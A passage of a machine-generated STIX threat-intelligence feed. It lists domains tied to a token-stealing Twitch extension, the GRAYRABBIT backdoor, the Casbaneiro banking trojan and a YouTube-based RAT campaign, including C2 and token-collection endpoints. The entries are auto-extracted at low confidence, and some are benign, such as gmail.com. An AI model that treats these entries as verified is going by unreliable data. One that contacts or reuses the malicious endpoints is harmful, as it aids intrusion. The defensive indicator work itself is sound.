News","url":"https://cybersecuritynews.com/malicious-twitch-extension/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--417e975c-bb1d-490a-bbe1-a175702cd031","created":"2026-09-14T13:50:00.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: enhanced-1.jeetbot.cc","description":"Seen in \"Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users\" (Cyber Security News). Context: tbot[.]cc, api[.]jeetbot[.]cc, enhanced[.]jeetbot[.]cc, and enhanced-1[.]jeetbot[.]cc IP address 132[.]243[.]113[.]25 CLODO Cloud, AS216154;","pattern":"[domain-name:value = 'enhanced-1.jeetbot.cc']","pattern_type":"stix","valid_from":"2026-09-14T13:50:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/malicious-twitch-extension/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9ae15e57-4174-4eb8-acbf-a6302b763fbf","created":"2026-09-14T13:50:00.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: enhanced.jeetbot.cc","description":"Seen in \"Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users\" (Cyber Security News). Context: Germany, AS197540; hosts jeetbot[.]cc, api[.]jeetbot[.]cc, enhanced[.]jeetbot[.]cc, and enhanced-1[.]jeetbot[.]cc IP address 132[.]243[.]1","pattern":"[domain-name:value = 'enhanced.jeetbot.cc']","pattern_type":"stix","valid_from":"2026-09-14T13:50:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/malicious-twitch-extension/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--fc159e79-55d4-47e0-9019-81d31fcc0faa","created":"2026-09-14T13:50:00.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: ext-03.jeetbot.cc","description":"Seen in \"Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users\" (Cyber Security News). Context: IP address 80[.]74[.]26[.]162 CLODO Cloud, AS216154; hosts ext-03[.]jeetbot[.]cc Domain jeetbot[.]cc Operator-controlled domain Domain a","pattern":"[domain-name:value = 'ext-03.jeetbot.cc']","pattern_type":"stix","valid_from":"2026-09-14T13:50:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/malicious-twitch-extension/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--5502274d-58d0-45d0-945d-82696a330f7c","created":"2026-09-14T13:50:00.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: ext-styles.jeetbot.cc","description":"Seen in \"Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users\" (Cyber Security News). Context: P address 132[.]243[.]113[.]25 CLODO Cloud, AS216154; hosts ext-styles[.]jeetbot[.]cc, morphilina[.]me, and drisnya[.]online IP address 80[.]","pattern":"[domain-name:value = 'ext-styles.jeetbot.cc']","pattern_type":"stix","valid_from":"2026-09-14T13:50:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/malicious-twitch-extension/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--0bf0fea9-be9d-4039-9296-4a7405a8ab43","created":"2026-09-14T13:50:00.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: gmail.com","description":"Seen in \"Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users\" (Cyber Security News). Context: tbot[.]cc Operator contact address Email address cybergnyda@gmail[.]com Developer email listed by chrome-stats Website identifier","pattern":"[domain-name:value = 'gmail.com']","pattern_type":"stix","valid_from":"2026-09-14T13:50:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/malicious-twitch-extension/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--6f4d4b20-2887-49a0-bbd5-06d1bff981c8","created":"2026-09-14T13:50:00.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: img.drisnya.online","description":"Seen in \"Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users\" (Cyber Security News). Context: elper/ Public extension-helper API endpoint Screenshot host img[.]drisnya[.]online Image hosting endpoint associated with the operation Hi","pattern":"[domain-name:value = 'img.drisnya.online']","pattern_type":"stix","valid_from":"2026-09-14T13:50:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/malicious-twitch-extension/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e6a6cead-a750-4155-a0af-246ea670d223","created":"2026-09-14T13:50:00.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: jeetbot.cc","description":"Seen in \"Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users\" (Cyber Security News). Context: ssociated with the extension listings Email address support@jeetbot[.]cc Operator contact address Email address cybergnyda@gmail[.","pattern":"[domain-name:value = 'jeetbot.cc']","pattern_type":"stix","valid_from":"2026-09-14T13:50:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/malicious-twitch-extension/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9081b974-6e0a-4fbd-9236-5d32b763565f","created":"2026-09-14T13:50:00.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: morphilina.me","description":"Seen in \"Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users\" (Cyber Security News). Context: ]25 CLODO Cloud, AS216154; hosts ext-styles[.]jeetbot[.]cc, morphilina[.]me, and drisnya[.]online IP address 80[.]74[.]26[.]162 CLODO","pattern":"[domain-name:value = 'morphilina.me']","pattern_type":"stix","valid_from":"2026-09-14T13:50:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/malicious-twitch-extension/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--bdcd8316-62aa-4ae0-a169-86416f40a571","created":"2026-09-14T13:50:00.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: proxy.morphilina.me","description":"Seen in \"Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users\" (Cyber Security News). Context: jeetbot[.]cc Alternate operator proxy C2 and proxy endpoint proxy[.]morphilina[.]me Token-strip proxy endpoint Configuration endpoint ext-s","pattern":"[domain-name:value = 'proxy.morphilina.me']","pattern_type":"stix","valid_from":"2026-09-14T13:50:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/malicious-twitch-extension/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--6d416709-9155-449a-bb68-d3dae413c24f","created":"2026-09-14T13:50:00.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: proxy.thebeholder.deno.net","description":"Seen in \"Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users\" (Cyber Security News). Context: up token-collection endpoint Historical collection endpoint proxy[.]thebeholder[.]deno[.]net/set-token Decommissioned backup token-collection endp","pattern":"[domain-name:value = 'proxy.thebeholder.deno.net']","pattern_type":"stix","valid_from":"2026-09-14T13:50:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/malicious-twitch-extension/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--0fa18e15-7397-4e5e-9958-a2786922fbe3","created":"2026-09-14T13:50:00.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: thebeholderbotapi.vercel.app","description":"Seen in \"Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users\" (Cyber Security News). Context: ssioned backup token-collection endpoint Privacy-policy URL thebeholderbotapi[.]vercel[.]app/twitch-conf Privacy-policy host cited in the investigat","pattern":"[domain-name:value = 'thebeholderbotapi.vercel.app']","pattern_type":"stix","valid_from":"2026-09-14T13:50:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/malicious-twitch-extension/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--189ecf62-80e6-4827-bd9c-43b823256970","created":"2026-09-14T13:50:00.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: thebeholder-proxy.deno.dev","description":"Seen in \"Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users\" (Cyber Security News). Context: ed token-collection endpoint Historical collection endpoint thebeholder-proxy[.]deno[.]dev/set-token Decommissioned backup token-collection endpoi","pattern":"[domain-name:value = 'thebeholder-proxy.deno.dev']","pattern_type":"stix","valid_from":"2026-09-14T13:50:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/malicious-twitch-extension/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2053792c-ca97-496f-961b-7d62bd668d0d","created":"2026-09-14T13:01:36.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: mail.uaiubifas.top","description":"Seen in \"One Click on a Malicious Link Lets Hackers Backdoor Sogou Input Method Users\" (Cyber Security News). Context: Staging server hosted on Alibaba Cloud in Hong Kong Domain mail.uaiubifas.top GRAYRABBIT command-and-control domain using port 443 SHA-25","pattern":"[domain-name:value = 'mail.uaiubifas.top']","pattern_type":"stix","valid_from":"2026-09-14T13:01:36.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/one-click-on-a-malicious-link/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--5d1796a6-1489-47a1-9f9e-64f80f10b08f","created":"2026-09-14T13:01:36.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: noht1ng.top","description":"Seen in \"One Click on a Malicious Link Lets Hackers Backdoor Sogou Input Method Users\" (Cyber Security News). Context: thod protocol link used to trigger the exploit chain Domain noht1ng.top Exploit-page hosting domain IP address 8.218.50.207 Staging","pattern":"[domain-name:value = 'noht1ng.top']","pattern_type":"stix","valid_from":"2026-09-14T13:01:36.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/one-click-on-a-malicious-link/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ae2c8957-8665-43a7-a1d2-72eb923ee81b","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: 115.201.178.68.host.secureserver.net","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: [.]host[.]secureserver[.]net Campaign infrastructure Domain 115[.]201[.]178[.]68[.]host[.]secureserver[.]net Campaign infrastructure Domain 181[.]202[.]178[","pattern":"[domain-name:value = '115.201.178.68.host.secureserver.net']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e7fde3d7-8d03-4ec5-a267-2074b28754d9","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: 116.181.62.50.host.secureserver.net","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: [.]host[.]secureserver[.]net Campaign infrastructure Domain 116[.]181[.]62[.]50[.]host[.]secureserver[.]net Campaign infrastructure Domain 48[.]178[.]169[.","pattern":"[domain-name:value = '116.181.62.50.host.secureserver.net']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ed2d869a-68ab-4885-8823-98084ad45ff8","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: 128.200.178.68.host.secureserver.net","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: a0c2f5a2cf5ca8f955ee3375e3ca66a5dc52b HTA downloader Domain 128[.]200[.]178[.]68[.]host[.]secureserver[.]net Campaign infrastructure Domain 13[.]189[.]202[.","pattern":"[domain-name:value = '128.200.178.68.host.secureserver.net']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--578fa415-b09c-4abb-8a77-e81593d2ec81","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: 129.202.178.68.host.secureserver.net","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: [.]host[.]secureserver[.]net Campaign infrastructure Domain 129[.]202[.]178[.]68[.]host[.]secureserver[.]net Campaign infrastructure Domain 76[.]180[.]62[.]","pattern":"[domain-name:value = '129.202.178.68.host.secureserver.net']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a89201d6-60d4-43d5-b930-afda43e1d930","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: 13.189.202.64.host.secureserver.net","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: [.]host[.]secureserver[.]net Campaign infrastructure Domain 13[.]189[.]202[.]64[.]host[.]secureserver[.]net Campaign infrastructure Domain 116[.]181[.]62[.","pattern":"[domain-name:value = '13.189.202.64.host.secureserver.net']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d81762db-ad77-4d10-a1f1-7ed93650e735","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: 135.201.178.68.host.secureserver.net","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: [.]host[.]secureserver[.]net Campaign infrastructure Domain 135[.]201[.]178[.]68[.]host[.]secureserver[.]net Campaign infrastructure Domain 85[.]182[.]62[.]","pattern":"[domain-name:value = '135.201.178.68.host.secureserver.net']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b62e4340-98b6-4170-8936-ce4f51434f0f","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: 162.201.178.68.host.secureserver.net","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: [.]host[.]secureserver[.]net Campaign infrastructure Domain 162[.]201[.]178[.]68[.]host[.]secureserver[.]net Campaign infrastructure Domain 129[.]202[.]178[","pattern":"[domain-name:value = '162.201.178.68.host.secureserver.net']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--017b0a96-091d-4b05-9f68-0a304eff0dc4","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: 181.202.178.68.host.secureserver.net","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: [.]host[.]secureserver[.]net Campaign infrastructure Domain 181[.]202[.]178[.]68[.]host[.]secureserver[.]net Campaign infrastructure Domain 135[.]201[.]178[","pattern":"[domain-name:value = '181.202.178.68.host.secureserver.net']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3c7c2ac1-261a-49e5-ad76-10ae6c1ae13c","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: 48.178.169.192.host.secureserver.net","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: [.]host[.]secureserver[.]net Campaign infrastructure Domain 48[.]178[.]169[.]192[.]host[.]secureserver[.]net Campaign infrastructure Domain 115[.]201[.]178[","pattern":"[domain-name:value = '48.178.169.192.host.secureserver.net']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a21a3c48-e636-4a8a-86de-7c1229247302","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: 76.180.62.50.host.secureserver.net","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: [.]host[.]secureserver[.]net Campaign infrastructure Domain 76[.]180[.]62[.]50[.]host[.]secureserver[.]net Campaign infrastructure Domain gexwalltool[.]co","pattern":"[domain-name:value = '76.180.62.50.host.secureserver.net']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--821d7490-4def-42f4-ba1e-5cab9d1e4a20","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: 85.182.62.50.host.secureserver.net","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: [.]host[.]secureserver[.]net Campaign infrastructure Domain 85[.]182[.]62[.]50[.]host[.]secureserver[.]net Campaign infrastructure Domain 162[.]201[.]178[","pattern":"[domain-name:value = '85.182.62.50.host.secureserver.net']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--df57e67a-7bee-4c96-8dcc-289cb8bc1665","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: gexwalltool.com","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: [.]host[.]secureserver[.]net Campaign infrastructure Domain gexwalltool[.]com Campaign infrastructure Domain x-wolverine[.]servebbs[.]c","pattern":"[domain-name:value = 'gexwalltool.com']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--fd999aa5-6602-4019-83f0-f45b158a1e92","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: x-wolverine.servebbs.com","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: ure Domain gexwalltool[.]com Campaign infrastructure Domain x-wolverine[.]servebbs[.]com Campaign infrastructure IP address 72[.]167[.]48[.]63 C","pattern":"[domain-name:value = 'x-wolverine.servebbs.com']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--0e857b32-176d-453d-ab3e-6c9cc18f497e","created":"2026-09-14T08:09:26.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: noht1ng.top","description":"Seen in \"China-Linked Hackers Exploit Sogou One-Click RCE to Deploy GRAYRABBIT Backdoor\" (GBHackers). Context: ryption RC4-encrypted communications Exploit-hosting domain noht1ng[.]top Staging-server IP address 8.218.50[.]207 Staging-server p","pattern":"[domain-name:value = 'noht1ng.top']","pattern_type":"stix","valid_from":"2026-09-14T08:09:26.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/grayrabbit-backdoor/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--291ada0d-586c-45c8-83bf-1555ecc66c48","created":"2026-09-14T08:09:26.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: uaiubifas.top","description":"Seen in \"China-Linked Hackers Exploit Sogou One-Click RCE to Deploy GRAYRABBIT Backdoor\" (GBHackers). Context: re. In this campaign, the payload reportedly contacted mail.uaiubifas[.]top over raw TCP port 443 and encrypted fixed-size 4,096-byte","pattern":"[domain-name:value = 'uaiubifas.top']","pattern_type":"stix","valid_from":"2026-09-14T08:09:26.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/grayrabbit-backdoor/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--13282df5-9c65-47a6-a5d9-51279cf8f7fc","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: achievershelf.space","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: to CL-CRI-1171 activity and subsequently taken down Domain achievershelf[.]space ; activitymeal[.]space ; additionplot[.]cfd ; adviceturn[","pattern":"[domain-name:value = 'achievershelf.space']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--0ab127a2-b3f7-4eff-a5b9-f4545a0a1890","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: activitykitty.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: CL-CRI-1171 gate and landing infrastructure Domain connect.activitykitty[.]xyz ; connect.apparatustaste[.]xyz ; connect.armcard[.]xyz ;","pattern":"[domain-name:value = 'activitykitty.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1766866a-4278-4a34-a6cc-a51a37233b2d","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: activitymeal.space","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: and subsequently taken down Domain achievershelf[.]space ; activitymeal[.]space ; additionplot[.]cfd ; adviceturn[.]xyz ; afternoonscrew[","pattern":"[domain-name:value = 'activitymeal.space']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2a648e39-6b5b-45a2-9ab3-ea33621df69a","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: additionplot.cfd","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: down Domain achievershelf[.]space ; activitymeal[.]space ; additionplot[.]cfd ; adviceturn[.]xyz ; afternoonscrew[.]space ; agreementju","pattern":"[domain-name:value = 'additionplot.cfd']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f939df07-7554-49f1-9c78-9aa77f7d6990","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: adviceturn.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: shelf[.]space ; activitymeal[.]space ; additionplot[.]cfd ; adviceturn[.]xyz ; afternoonscrew[.]space ; agreementjuice[.]space ; airpl","pattern":"[domain-name:value = 'adviceturn.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--91ca47ae-92c5-40d3-8fe4-8e2fea1cee1b","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: afternoonscrew.space","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ivitymeal[.]space ; additionplot[.]cfd ; adviceturn[.]xyz ; afternoonscrew[.]space ; agreementjuice[.]space ; airplaneiron[.]xyz ; airtwig[.","pattern":"[domain-name:value = 'afternoonscrew.space']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security 